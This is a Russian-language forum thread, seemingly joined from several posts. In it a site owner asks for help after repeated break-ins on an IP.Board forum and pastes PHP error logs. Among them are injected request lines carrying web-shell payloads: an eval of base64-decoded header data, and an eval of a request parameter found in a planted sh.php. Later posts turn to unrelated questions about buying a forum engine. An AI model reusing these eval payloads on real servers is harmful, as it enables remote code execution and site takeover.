hybrid

Лицензия стоит ibresource. Но дело в том, что пол года закончились уже и невозможно скачать обновления. Если бы это был какой-то ломаный форум, я бы просто скачал новую версию.

Ничего не поменялось,опять ломают, но теперь шелы уже добавляют. Ссылка на архив тут, может кто-то посмотрит файлы? Пароль на архив 123. Особенно интересует df.php. Он находится в зашифрованном виде. Что через него можно было сделать? Да, и ломают точно не через фтп. Как-то по другому заливают. Я сегодня днем на хост добавил файл .ftpaccess c ограничением по ip. Так что этот вариант точно отпадает. Хотя есть ещё вариант, что я не правильно разместил этот файл. Нужно в корень хоста или в корень сайта? У меня сейчас он в корне хостинга находится. Я оттуда и брал, но это для английской версии и он не работает. А не из проверенных источников ставить не хочется. Забыл ещё логи выложить, которые создает форум: [04-Nov-2012 20:00:02] PHP Warning: mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230 [04-Nov-2012 20:00:02] PHP Warning: mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626 [04-Nov-2012 20:00:02] PHP Warning: mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608 [04-Nov-2012 20:00:02] PHP Warning: mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230 [04-Nov-2012 20:00:02] PHP Warning: mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626 [04-Nov-2012 20:00:02] PHP Warning: mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608 [04-Nov-2012 20:00:02] PHP Catchable fatal error: Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/lp/sources/base/core.php on line 5583 Продолжение: ============================================================================== ========================= END =================================== ========================= /forum/index.php?%3C?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A030F21C11]));exit;?%3E =================================== ==============================================================================

Design_Nick, ничего лично, но я пытаюсь вообще не ставить лишних модификаций из непроверенных источников. Видимо единственный вариант это обновить форум до последней версии. FatCat, с чего вы взяли, что именно по фтп ломанули? Сейчас стоит filezilla и всё пароли в ней сохранены. Можно ли в обход программы получить доступ к паролям? Ещё слышал, что ftp дырявый протокол и нужно sftp пользоваться. Вот никак руки не доходили, может из-за этого протокола взломали? Вообще как защитить себя от подобного? Ведь рано или поздно, даже если вручную введу данные, их могут перехватить? При условии, что на компьютере троян? Какой у вас антивирус стоит? Что посоветуете?

siv1987, дело в том, что все доступные заплатки для моей версии уже давно стоят. Ещё до взлома были. Сейчас переименовал админку, пусть помучается. Надо было давно переименовать её Кстати, написал хостеру, хочу логи попросить. Интересно что в них будет. Стоп, не все обновления стоят. Сейчас заметил, что в админке есть новое обновление, но оно не походит для русской версии ipb. Странно, почему здесь до сих пор нет обновлений? Может кроме этого обновления я пропустил ещё какие-то?

У меня все файлы проверяются на хостинге, если что-то новое добавляется, то я вкусе об этом.

siv1987, выключено, хоть это радует. Не подскажите что ещё можно посмотреть. Может логи сервера или ещё что? Чтобы понять что они ломают и как?

siv1987, если не трудно подскажите как проверить работу глобальных массивов? Я так понимаю, что если в php.ini прописано: ; register_globals to be on; Using form variables as globals can easily lead То они выключены? Если я отключу эти массивы не будет ли проблем с движком? У меня стоит ipb и dle. И главное где отключать лучше? Через .htaccess? Таких файлов целая куча в папках, я так понимаю нужно добавить строку в корневой?

Ребят, подскажите что делать? Где искать дырку? Может в логах каких-то есть информация? Сегодня на хостинге обнаружил новый файл sh.php: ============================================================================== ========================= END =================================== ========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E =================================== ============================================================================== ============================================================================== ========================= END =================================== ========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E =================================== ============================================================================== Файл лежал в папке cache. Ещё вчера его не было. Вот ещё информация из eror_log: [02-Nov-2010 22:04:11] PHP Fatal error: Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376 [02-Nov-2010 22:04:24] PHP Fatal error: Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376 [02-Nov-2012 05:27:03] PHP Catchable fatal error: Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/admin/sources/base/core.php on line 5583

Цена не маленькая, наврдли я буду снимать копирайты за такую цену. Решил спросить на форуме потому что я еще точно не определился какой движок покупать. Возможно возьму другой потому что для меня не приемлемо ставить ссылку со своего сайта на чужой, даже если это сайт разработчиков. Еще конечно есть вариант взять все ссылки в noindex и nofollow. Что вы можете сказать по этому поводу? Это тоже нарушением будет?

Вот решил приобрести движок для форума, и стою перед выбором. Покупать какой-то простой двиг, но без копирайтов, либо этот и придется оставить ссылку как я понял. Еще вот прочитал в лицензионном соглашении, что можно будет убрать ссылки за определенную плату, но не написано сколько...